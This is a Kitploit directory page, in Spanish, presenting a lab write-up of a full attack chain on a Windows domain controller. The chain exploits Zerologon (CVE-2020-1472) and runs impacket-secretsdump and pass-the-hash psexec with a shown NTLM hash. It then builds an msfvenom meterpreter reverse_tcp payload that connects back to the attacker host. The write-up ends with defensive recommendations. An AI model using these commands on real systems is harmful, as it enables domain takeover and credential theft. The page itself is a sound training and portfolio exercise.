Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Domain-Controller-DC-Exploitation-with-Metasploit-Impacket — Explotación de extremo a extremo de un Domain Controller usando Metasploit e Impacket: se descubrió DC10, se explotó Zerologon (CVE-2020-1472), se extrajeron hashes NTLM, se obtuvo una shell SYSTEM y se estableció una sesión de Meterpreter. | Kitploit
Herramientas/GitHubGitHub/nyambiblaise/domain-controller-dc-exploitation-with-metasploit-impacket
ReconocimientoFrameworks de ExploitsGeneración de PayloadsAnálisis de VulnerabilidadesMovimiento LateralPost-ExplotaciónPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
GitHubnyambiblaise/domain-controller-dc-exploitation-with-metasploit-impacket

Domain-Controller-DC-Exploitation-with-Metasploit-Impacket

Explotación de extremo a extremo de un Domain Controller usando Metasploit e Impacket: se descubrió DC10, se explotó Zerologon (CVE-2020-1472), se extrajeron hashes NTLM, se obtuvo una shell SYSTEM y se estableció una sesión de Meterpreter.

Ver Repositorio
hace 10 mesesAún no revisado
Compartir

Explotación del Controlador de Dominio DC con Metasploit e Impacket

Explotación de extremo a extremo de un controlador de dominio usando Metasploit e Impacket: descubrí DC10, exploté Zerologon (CVE-2020-1472), extraje hashes NTLM, obtuve un shell SYSTEM y establecí una sesión Meterpreter.

Resumen ejecutivo Este ejercicio demuestra una cadena de ataque completa y realista contra un controlador de dominio vulnerable a CVE-2020-1472 (Zerologon). El compromiso incluyó descubrimiento, enriquecimiento de servicios, explotación, extracción de credenciales, movimiento lateral y validación posterior a la explotación. Obtuve con éxito acceso a nivel SYSTEM y establecí una sesión Meterpreter persistente en el DC usando una combinación de Zerologon, Impacket secretsdump + pass-the-hash, y payloads de msfvenom/meterpreter. Se recopilaron capturas de pantalla y artefactos de comandos en cada etapa como evidencia.

Resumen del laboratorio: Simulé una cadena de ataque completa contra un controlador de dominio de Windows usando Metasploit e Impacket ; descubrimiento, Zerologon, secretsdump, pass-the-hash y una sesión Meterpreter controlada.

Por qué es importante para las organizaciones: Porque el DC controla la autenticación, las directivas de grupo y la identidad de todo el dominio; un compromiso puede desencadenar una interrupción total del negocio, apropiación de cuentas, exfiltración de datos, despliegue de ransomware y pérdida de confianza regulatoria. Proteger los DC salvaguarda la disponibilidad, los ingresos y la reputación al evitar que los atacantes conviertan la identidad en un único punto de fallo.

Explotación del controlador de dominio (DC) con Metasploit + Impacket

ESCENARIO

Se te proporcionan dos máquinas en una red de laboratorio contenida. Un sistema es un controlador de dominio (DC) de Windows llamado DC10 que aloja servicios centrales de Active Directory (AD). El otro sistema es una estación de trabajo Kali ubicada en la misma subred de servidores para pruebas. Se asume que el DC expone servicios típicos de dominio (por ejemplo, LDAP, Kerberos, SMB) y puede ser vulnerable a problemas conocidos. Se espera que el host Kali se utilice para reconocimiento, explotación, acceso a credenciales, movimiento lateral y validación posterior a la explotación. La tarea es identificar el DC, confirmar los detalles del dominio, obtener un punto de apoyo inicial utilizando una técnica aplicable, extraer material de credenciales para habilitar el acceso administrativo y luego demostrar el control del DC a través de un shell remoto y una sesión de agente gestionado, adaptándose a cualquier restricción ambiental, como servicios parcheados, egreso restringido o defensas de punto final. DC: 10.1.16.1 Kali: 10.1.16.66

Hallazgos clave

  • Vulnerabilidad crítica explotada: CVE-2020-1472 (Zerologon) se explotó con éxito para restablecer la contraseña de la cuenta de máquina del DC a vacío.
  • Compromiso de credenciales: Se extrajeron hashes NTLM del DC (secretsdump), revelando credenciales de Administrador que permiten pass-the-hash.
  • Control total del dominio demostrado: Usando los hashes extraídos, se obtuvo un shell SYSTEM en DC10 (psexec) y se ejecutó un shell reverso Meterpreter estable, confirmando ejecución remota de código y persistencia.
  • Servicios expuestos: LDAP, Kerberos, SMB y servicios RPC relacionados eran accesibles desde el host atacante, permitiendo descubrimiento y explotación.
  • Riesgo de superficie de ataque: El DC aceptó operaciones remotas que permitieron la manipulación de cuentas de máquina y la ejecución remota de payloads.

1) Descubrimiento y Alcance

Usé msfconsole con soporte de BD, ejecuté un barrido nmap desde MSF, importé los resultados y refiné hosts y servicios para confirmar la exposición de DC10.

  • Lancé msfconsole con soporte de BD y confirmé la conectividad de la base de datos.
  • Ejecuté un escaneo nmap a través de la subred desde msfconsole e importé los resultados a la BD de MSF.
  • Limpié la tabla de hosts para eliminar mi IP de Kali. Revisé los servicios para identificar posibles indicadores de DC.
  • Usé el escáner de puertos SYN de MSF con un rango de puertos restringido y subprocesos globales para refinar los datos de servicios.
  • Fingerprinté SMB en hosts Windows para enriquecer los detalles del sistema operativo.
  • Confirmé los servicios LDAP y Kerberos en 10.1.16.1 y verifiqué el nombre de dominio mediante una consulta LDAP.
  • Decisión: Tratar 10.1.16.1 como el objetivo DC para explotación y acceso a credenciales.
Imagen Imagen Imagen

2) Enriquecimiento de Servicios y Confirmación del DC

Realicé un escaneo de puertos SYN en MSF, fingerprinté SMB y confirmé LDAP y Kerberos en 10.1.16.1. Consulté LDAP para obtener el nombre de dominio.

Imagen Imagen Imagen Imagen Imagen

Verificación de versión SMB

  • Usé el módulo de versión SMB en msfconsole: auxiliary/scanner/smb/smb_version.
  • Configuré los objetivos desde la tabla de hosts con hosts -R .
  • Obtuve el dialecto SMB y los detalles del sistema operativo.
  • Resultado: 10.1.16.1 mostró información de Windows Server, lo que coincidía con que fuera el controlador de dominio.
Imagen Imagen Imagen Imagen Imagen

Consulta LDAP

  • Para el módulo de consulta LDAP , usé auxiliary/gather/ldap_query.
  • Configuré rhosts 10.1.16.1 para apuntar directamente a DC10.
  • Lo ejecuté para obtener información básica del directorio.
  • Resultado: Confirmé el nombre de dominio como “structureality” y que LDAP en el DC estaba respondiendo.
Imagen Imagen Imagen Imagen

3) Explotación de Zerologon (Acceso Inicial)

Ejecuté auxiliary/admin/dcerpc/cve_2020_1472_zerologon contra DC10 para restablecer la contraseña de la cuenta de máquina a vacío.

Imagen Imagen

4) Acceso a Credenciales (secretsdump)

Usando Impacket, extraje hashes NTLM del DC e identifiqué credenciales de Administrador para pass-the-hash.

impacket-secretsdump -just-dc-ntlm structureality/dc10\[email protected]

Imagen Imagen

5) Movimiento Lateral (psexec)

Usé pass-the-hash con psexec para obtener un shell a nivel SYSTEM en DC10 y validé la identidad del host.

impacket-psexec structureality/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:dae57d78fec919471799ce0fae8236b9 Como puedes ver, ya estoy en C:\Windows\system32

Imagen Imagen

6) Post-Explotación (Meterpreter)

Generé un payload meterpreter reverse_tcp, lo alojé por HTTP, lo descargué en DC10, inicié un handler y ejecuté el payload para abrir una sesión Meterpreter.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.1.16.66 LPORT=4567 -f exe -o secretfile.exe

Imagen Imagen Lancé un servidor web básico para permitir que el sistema objetivo acceda fácilmente a este ejecutable de meterpreter usando:

python3 -m http.server 8080

Imagen En la máquina objetivo, ejecuté el ejecutable de meterpreter (secret.exe) Imagen Imagen Imagen Imagen Imagen

Como puedes ver, ahora he establecido una conexión de shell reverso entre el DC10 objetivo y los sistemas Kali. Esto se logró usando solo exploits externos/remotos contra el objetivo vulnerable.

Si bien el sistema Kali está ubicado en la subred de servidores junto con el objetivo DC10, estos tipos de ataques son posibles a través de Internet si el sistema objetivo está expuesto a internet abierta.

7) Resultados Clave

  • DC10 identificado como controlador de dominio de structureality
  • Zerologon tuvo éxito, permitiendo la extracción de credenciales
  • Hash de Administrador utilizado para el shell SYSTEM mediante pass-the-hash
  • Sesión Meterpreter estable confirmada en DC10

Evidencia

  • Registros de escaneo de subred de MSF DB y nmap que confirman el descubrimiento de hosts/servicios.
  • Resultado de enumeración SMB/LDAP/Kerberos que confirma los servicios del DC y el nombre de dominio structureality.
  • Salida del módulo Zerologon que muestra el restablecimiento de la contraseña de la cuenta de máquina a vacío.
  • Salida de secretsdump con los hashes NTLM extraídos.
  • Registros de sesión de psexec que demuestran C:\Windows\System32.
  • Capturas de pantalla de msfvenom y de la sesión Meterpreter que confirman el control remoto.

Acciones Realizadas (resumen)

  • Descubrimiento y Alcance: escaneos nmap desde msfconsole; BD de MSF usada para gestionar hosts/servicios; confirmado DC10 como objetivo.
  • Enriquecimiento de Servicios: fingerprinting de SMB, consultas LDAP, confirmación de Kerberos para validar el rol de controlador de dominio.
  • Acceso Inicial: Ejecuté auxiliary/admin/dcerpc/cve_2020_1472_zerologon para restablecer la contraseña de la cuenta de máquina del DC.
  • Acceso a Credenciales: impacket-secretsdump para extraer hashes NTLM del DC.
  • Movimiento Lateral: impacket-psexec usando el hash NTLM de Administrador → shell SYSTEM.
  • Post-Explotación: Creé y alojé el payload meterpreter (msfvenom), lo descargué y ejecuté en el DC, y confirmé la sesión persistente.

Recomendaciones para los Propietarios de la Red

  • Parchea la vulnerabilidad de Netlogon de inmediato y verifica con un escaneo de exposición a CVE-2020-1472
  • Aplica firma SMB y restringe la exposición de SMB y RPC del DC solo a subredes administrativas de confianza
  • Implementa administración por niveles y deniega la ejecución remota de servicios desde hosts de gestión no administrativos
  • Deshabilita o controla estrictamente NTLM, prefiere Kerberos y monitorea patrones de pass-the-hash
  • Control de egreso: restringe las conexiones salientes desde servidores y permite solo destinos y puertos requeridos
  • Protección de puntos finales: bloquea binarios sin firmar y aplica escaneo integrado con AMSI a PowerShell
  • Monitoreo: alertar sobre restablecimientos de contraseña de cuentas de máquina, acceso anómalo a DRSUAPI y listeners inesperados tipo handler
  • Rota regularmente las credenciales privilegiadas y usa soluciones LAPS o PAM para reducir el riesgo de reutilización de hashes
Descargar herramienta